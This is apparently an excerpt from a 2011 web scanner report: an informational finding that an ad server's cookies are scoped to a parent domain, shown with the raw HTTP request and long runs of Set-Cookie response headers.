Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JGOr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kry8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Y6sq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_psQo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JI-L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PAkW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SRnI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aSXs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hcp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bq8b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lww9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_n6fk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__KA3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YeNy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Pk3I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_65qD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuxR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l77R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GQV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2jdP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7SED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_3Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PtS0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p1rh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-lLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lfkx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yt-D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KhUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LqXQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Vodh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r94O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0rr2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RAwv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AHDy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_moDT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7bUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:43:01 GMT

GIF89a.............!.......,...........D..;

13.11. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
